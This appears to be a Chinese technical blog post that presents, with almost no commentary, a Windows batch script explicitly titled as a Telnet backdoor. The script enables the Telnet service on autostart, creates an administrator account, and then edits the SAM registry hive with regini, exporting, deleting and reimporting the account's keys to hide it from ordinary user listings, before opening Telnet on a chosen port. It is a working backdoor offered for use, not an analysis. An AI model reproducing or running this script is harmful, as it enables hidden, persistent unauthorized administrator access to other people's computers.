2. 技术人生
    3. 批处理开启TelNet后门

    批处理开启TelNet后门

    技术2024-10-18  4

    @echo off title 生成Telnet远程登录 setlocal enabledelayedexpansion if not exist "%windir%/system32/tlntsvr.exe" ( echo 找不到Telnet服务文件,请退出 pause exit ) sc config tlntsvr start= auto sc start tlntsvr cls :a set /p user=请输入用于Telnet登录的用户名: if "!user!"=="" ( echo 用户名不能为空 goto a ) set /p psw=请输入用于Telnet登录的密码: set /p pswb=再次输入密码: if not !psw!==!pswb! ( cls echo 两次输入的密码不相同! goto a ) :b set /p port=请输入要设置的Telnet服务端口,必须是小于1024的正整数: echo !port!|findstr "^[0-9]*$">nul if !errorlevel!==1 ( echo 请输入纯数字! goto b ) if !port! lss 1 ( echo 请输入小于1024的正整数! echo 请输入大于1小于1024的整数! goto b ) if !port! geq 1024 ( echo 请输入小于1024的正整数! goto b ) cls echo 用户名:!user! echo 密码:!psw! echo 端口:!port! set /p y=确定吗?(y,n): if not !y!==y ( cls goto a ) cd %temp% net user "!user!" "!psw!" /add net localgroup users "!user!" /del net localgroup administrators "!user!" /add echo HKEY_LOCAL_MACHINE/SAM/SAM [1 8 19] >regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/!user! [1 8 9] >>regset.ini regini regset.ini reg export "HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/!user!" 1.reg for /f "usebackq skip=3 tokens=2 delims=(" %%j in (`type 1.reg`) do set tt=%%j echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/00000!tt:~0,-2! [1 8 9] >regset.ini regini regset.ini reg export "HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/00000!tt:~0,-2!" 2.reg net user "!user!" /del reg import 1.reg reg import 2.reg del /f /a /q 1.reg del /f /a /q 2.reg echo HKEY_LOCAL_MACHINE/SAM/SAM [17] >regset.ini regini regset.ini del /f /a /q regset.ini net localgroup TelnetClients /add net localgroup telnetclients /comment:"TelnetClients 组中的成员被赋予远程登录计算机的权限" net localgroup TelnetClients "!user!" /add cls color a tlntadmn config port= !port! echo 开始测试Telnet服务! echo 登录用户名为:!user! ,密码是:!psw! echo Telnet的端口为:!port! pause :c telnet 127.0.0.1 !port! if not !username!==$ ( echo 没有登录,重新测试吗? echo 已经登录过了,请直接关闭本窗口! pause goto c )  

    最新回复(0)